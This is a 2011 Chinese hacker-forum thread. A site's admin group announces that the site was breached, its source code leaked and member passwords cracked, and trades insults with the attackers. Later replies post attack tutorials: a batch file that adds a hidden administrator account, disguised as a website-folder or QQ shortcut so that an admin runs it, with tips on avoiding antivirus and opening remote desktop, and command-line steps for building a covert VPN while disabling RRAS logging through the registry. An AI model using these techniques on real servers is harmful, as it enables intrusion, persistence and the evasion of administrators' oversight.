最近看过此主题的会员

返回列表 发帖

关于网上对非安全中国网团队不实信息是污蔑!

近日发现在某些人通过挂黑页等方式散播污蔑和挑衅的话语,话语中充斥了污蔑团队的言语,这是对非安全中国网的严重诽谤!我们对某些不负责人的行为表示强烈鄙视和谴责!希望广大网友不要受此蛊惑。事情的缘由将在下面声明中予以说明.我们发布此消息是为了让长期支持和鼓励非安全中国网的朋友们不要因此产生任何疑虑,同时对国内某些所谓”黑客”的同志予以警示,并希望圈内朋友不要听信单方面的言辞,以免对非安全中国产生误解,还希望同行能慎重考虑某些国内黑客组织成员的人品,在今后的技术交流中慎重对待此类人的言辞与行径!
8 H0 _- Q# _+ N6 V在此,非安全中国网声明如下:
' q& E+ u5 ]. e: U0 @; r0 b1. 关于事情过程
* t) P# d9 K0 r/ u  t8 J+ c本站于2.13日(或之前几日)上午得到刀客(网友)朋友友情提醒,网站被入侵,本站在接到通知后就进行了初步的修补,并进行数据备份和转移工作,由于服务器上其他网站程序的漏洞问题导致网站被篡改,管理组原计划下午更换服务器,并将此情况在某些群做了说明(可查),之后下午在数据转移过程中,网站被某和谐群组织成员进行了修改,此事本站并未深究,晚些时候某网站开始发布文章散布入侵过程并对本站进行重伤,并于晚些时候开始散播本站源程序(原创程序未经白盒测试),管理组于同一时间关停了网站并就有关言辞予以了回应,于2.13日管理员紧急进行了数据转移工作,一整晚未眠进行了数据恢复,促使网站于2.14日早上3点左 右恢复访问,2.14日下午此前攻击我站的某人借助网站源码破解成员密码再次进行攻击,篡改网站主页,并留下”一群2B”等进行挑衅的字样,2.14日晚本站再次更改数据密码并对网站整体路径结构作了调整!在管理员对网站进行恢复的过程中,攻击我们的个人/组织不断通过QQ群进行挑衅,非安全中国网在恢复数据的路上,无暇与此个人或组织进行调解,只是作为一个低调的组织,我们很愤慨的说:那个谁(已查明)或某组织,圈子里面你们的2B有目共睹!
& M# Y. z6 c- z# Y, o- G2. 有关致谢
* i  g5 x5 H2 p4 i" m这里感谢刀客对本站友情提醒,感谢某群相当多大牛对我们的支持,感谢管理组及非安全中国网为此事上火的朋友们!真诚的感谢!. Q7 m1 F7 ~2 }2 v; T% Q- |& h
3. 对于攻击者
2 Y) b4 k1 W8 E% U& J9 \' K我们坚信一个人品欠佳甚至极差的黑客,面临的将会是圈子的唾弃和法律的制裁,至于扬言别人组织2B的攻击者,我相信圈子里的人各自心里有杆秤,只是大家都没有说出来而已!我们为这种行为感到不齿!' x$ ^, G+ T( n9 J
拿了别人东西还四处跟人说那是我偷的,你不2B谁2B啊!# A8 Z1 j, ~% a7 a. G, F
对于攻击者留下的记录我们已经通过提取日志等手段进行了记录,四川成都某自称为”黑客”的攻击者,湖南某人,天津某用户,我们保留回应的权利!
. Q* A  [1 X8 n+ }( W3 o4. 针对个人的侮辱
) |! G! H1 i! t8 i. V该攻击者对非安全中国网管理团队的个人进行的侮辱,我们只能说谁2谁知道!关于秋风管理,此人年纪尚小,但有刻苦学习的精神,对技术的追求不像某些2B的个人至少在人品上比某些人好得多,至于杨过也上网为人处事可以多问问资历老一点的圈内前辈!2B不2B,那个所谓的黑客你说了不算!
- K5 P9 I8 H5 V# X$ Q6 ]9 m/ C5.  我们道歉0 ~& |1 ]: p2 {& ^: r
本站因源码泄露而本站无法衡量持有此数据的个人及组织的人品及道德水准,我们为此向广大非安全中国网论坛的会员致歉!希望你们能理解,本站建议您更改在非安全中国网论坛的账号密码,以避免被不良个人及组织非法利用造成损失!3 d9 ^- W( a8 M6 v' f1 f/ E
6. 保留权利, p$ }( r* }. L6 Z. I4 |3 m
对于拿到源码并进行攻击测试的人,如果你继续进行挑衅和攻击,我们将采取全部手段进行还击!请好自为之!
0 W- x$ v: [/ s8 ~1 t( o9 b7 O% x/ q/ F/ Y
                                                                                                                      非安全中国网管理组- l$ T4 [" j4 R9 c. s6 m3 R6 e5 R" t+ J
                                                                                                                             2011.2.15, c! P9 A3 i- Z( A2 X* d3 y6 @7 {
感谢朋友们对非安全中国网的信任和支持!(排名不分先后,还有很多没有整理出来的朋友这里由衷对你们支持与信任给予感谢!)7 Z6 G8 @% R6 i9 Q( N" o; E1 u" x5 y
http://t.qq.com/hackx_cc( @0 P. Z! x( \3 m# K
http://t.qq.com/unknownman2 x7 R$ Q- x. _' H+ ?" P
http://t.qq.com/KsandJing8 x4 M. `" `% L; Z* |7 d
http://t.qq.com/hackzhi
1 k, }3 K& E+ @3 Q# \  Ohttp://t.qq.com/sunliming! I; `" e5 r7 x9 o6 B% D
http://www.hackerrz.com/?p=1051" L7 z7 o  @) [8 N1 G' y% G/ F
http://hi.baidu.com/%E6%97%A0%E6%83%85m/blog/item/9f2f1d0c471a3e396159f33a.html?timeStamp=1297786058484
: ?+ {' u* n* j, f% yhttp://pow78781.blog.163.com/blog/static/30251131201111511913827/

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

非安全5周年纪念 团队T恤出炉

恭祝非安全中国网全体朋友龙年大吉!

2011非安全中国网新年回馈广大朋友邀请码发放!

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

献给在这个世界上摇摆不定的朋友们

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

哥从来没想到咱们这种不盈利的组织都有人诬陷

TOP

附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

本帖最后由 ╰ァ唸從偂 于 2011-2-16 11:36 编辑
+ m4 \7 A- h1 U! O9 e0 w- b8 j$ q6 w9 m8 U2 p
对于污蔑非安全团队行为的个人或组织表示严重鄙视,他(们)不配在圈子里混……

TOP

可真是2B到家了。。
6 F% m$ b8 R' H+ @7 G, L: H不怕黑客技术差,就怕黑客人品差。。

TOP

哈哈,韵味。

TOP

附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

TOP

另类提权之利用快捷方式劫持提权
新建一个temp.bat,内容@echo offnet user enterer 123456 /add & net localgroup administrators enterer /addstart c:wwwrootattrib "c:wwwroot" -h -sdel c:php        emp.batdel c: wwwroot.lnkexit意思是在运行一个快捷方式的时候添加账号并且打开网站的文件夹,最后把文件夹的隐藏属性去掉并且删除自己。这个是默认运行在C:php里的temp.bat 打开的网站文件夹是c:wwwroot可以根据现实进行修改
1 ]& \9 T7 E- @
点击temp.bat的右键选择建立快捷方式,把快捷方式放在网站一样的文件夹或者前一个文件夹。当你主动提权失败的时候就可以用这个方法了,可以挂黑页或者发email给管理员。管理员登陆服务器的时候,访问我们的快捷方式(他以为是网站的目录),此时就可以提权成功了。这里给的是一种思路,不要问怎么把网站文件夹隐藏,怎么去掉快捷方式的箭头等等。因为用快捷方式会闪现一个CMD窗口,可以考虑把快捷方式改成exe文件(就不会有箭头,但是有后缀),把运行的bat改成exe或者vbs等,使CMD窗口不显现(具体可以用bat2exe等工具)。或者你有权限修改桌面快捷方式,那就不担心箭头问题了。把管理员可能经常用的程序,如QQ等快捷方式修改成指向可以运行提权命令并可以运行QQ的bat文件。例如@echo offnet user enterer 123456 /add & net localgroup administrators enterer /addstart c:qqqq.exeexit这个也算变相的捆绑了,不过绝对是免杀的。命令可以是加账号或者开3389,运行telnet服务等。怎么诱导管理员点击就是大家的问题了。文章都是字可能大家不太习惯,希望大家有耐心看完,虽然这样提权的机会比较小,但是作为一种思路吧,呵呵

) u- ~" F" d& f1 x( j8 j, `0 Y
5 V. B7 l+ ~" P! m$ j4 x3 |% A  z
1 |3 w9 p& U( o& b9 z- a
+ t0 a! \+ n0 v3 ]
5 }! y( @& }  M# z
4 s7 g6 n0 U# C! A7 _" H8 s
5 s' i, J; ]" k2 y
, z$ S; ]2 K9 `* k& V1 J
8 D. v/ ?, h" V+ q4 o. y, Z
$ e" n# T3 D$ ?2 x) r: Z  w" f
; j3 Q! b% D7 j* E5 r! g: r0 a' @( [& W# _, ]
4 H) I) q! U9 `+ C2 _

) s7 I' l* G9 T. o; _1 A( E# a
; X+ q  N' @' w0 H$ z+ ^- Q% ~' e# c

. \. M* @% x* Q& l/ _( N3 _* U$ e2 {6 _' ], l
: u# d% K- {8 V: ]$ g9 [
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

CMD下如何建立VPN
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>
9 c" K' _/ B# d: y0 s9 `2 ?" E' a) ?
6 f$ h5 x# n, E: a( G3 R8 o9 {
6 T! L! m" _  e7 C3 |" c! N3 m6 n, ?4 R8 I
CMD下建立VPN
& t% d: w9 w- m) @7 ?( @4 X8 h7 ]  e: l; L9 N4 u
9 E  c# l5 ]. g. @7 s% }% _. R
1.前提 服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去) 远程注册表服务必须开启 server服务必须开启 router路由服务必须开启 两块以上网卡的win2000做vpn很方便,添加nat协议后,客户端拨入,能够使用远程网络连接internet。 使得部分客户端可提高网络速度,并达到代理的作用。 一块网卡的winxp,win2003做类似的vpn仍然很方便,nat协议添加后,再添加两个接口,一个是本地连接,一个是内部,设置本地连接为全转发,内部为私有模式,既可让有权限的用户拨入。 一块网卡的win2000,做类似的vpn就不方便了,nat协议添加后,再添加接口,只可以添加上本地连接,内部不容许图形界面的添加,察看了netsh dump >c:1.txt后,尝试在netsh命令添加内部接口,通过。 命令为:netsh routing ip nat add interface 内部 private 下面是部分常用命令: netsh ras set user username permit //设置用户授权,该用户不能为tsinternetuser support_388945a0等。 netsh ras ip set addrassign pool //设置静态地址池模式 netsh ras ip add range 10.0.0.1 10.0.0.100 // 设置静态池范围 ,要用标准的局域网地址,避免将来在访问internet时候地址转发错误。 netsh routing ip nat install //添加nat协议 netsh routing ip nat add interface 本地连接 full //添加nat接口本地连接全转发 netsh routing ip nat add interface 内部 private //添加nat借口内部私有模式 igmp同样可以在netsh配置,命令行很长: netsh routing ip igmp install netsh routing ip igmp add interface 内部 igmpprototype=IGMPRTRV2 ifenabled=enable robustvar=2 startupquerycount=2 startupqueryinterval=31 genqueryinterval=125 genqueryresptime=10 lastmemquerycount=2 lastmemqueryinterval=1000 accnonrtralertpkts=YES netsh routing ip igmp add interface name="本地连接" igmpprototype=IGMPPROXY ifenabled=enable 如果配置前已经有接口,就要先删除: netsh routing ip igmp delete interface 内部 //与此类似 路由和远程访问服务会在系统、安全日记中记录不少信息,比如ipsec、登陆信息。 修改一下注册表可以避免: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasManParameters ProhibitIPsec"=dword:00000001 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteAccessParameters LoggingFlags"=dword:00000000 现在除了登陆信息,ipsec,remoteaccess警告,已经不记录。 ---------------------------------------- 还有值得一提的是建立好地vpn,通常使用的都是pptp协议,tcp1723端口,如果我们在网卡的ip策略添加了tcp1723的容许条目,基本上可以拨入。为什么是基本呢,因为pptp除了 tcp1723外还有一个ip47号协议,不同于tcp不同于udp,此协议对于认证很重要。如果网络上的防火墙割断的话,会出现拨号->用户认证 ->不通过认证断开的问题。 在配置vpn的时候,还需要remoteregister服务的支持,建立好以后可以关掉。 workstation , server,rpc同样在配置时候需要。 ---------------------------------------- 经测试,全命令行的建立vpn后,rrasmgmt.msc不出现具体配置信息。也就是说只有看网络连接文件夹,才能看出来一个拨入的连接</TABLE>
, H2 b; L7 g  l$ u9 |9 h! c0 E
3 m: Y: @! f1 ^$ l
+ \, J0 c% ^) s* }- H2 F: ~* ?0 l
. x! @  O. Z4 F" Z9 [9 Y# ^) B
, N6 }8 j$ N2 W3 G( ]1 f0 j$ y3 N  Q$ d4 {5 x
+ U- q2 O- b! T2 c% |1 e" ?$ d

9 T2 {5 C7 w5 m, g
8 a' e( O; o% a1 c) s8 o( S
% q$ `. Q, L$ l& Z- T  T4 v7 s9 K- w2 f9 j
* R! y/ a2 E6 k9 R+ g1 l

3 Q# y( s6 X9 o3 G6 y& M+ {" q8 A" x

' _  e0 p3 ^0 W+ J
+ g$ f, \# k: j
8 z' O: _. F1 Z7 N
* [$ ]% O+ X6 F4 G9 K" Y8 P& I# b
& k& H- T, d" `( x! y公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表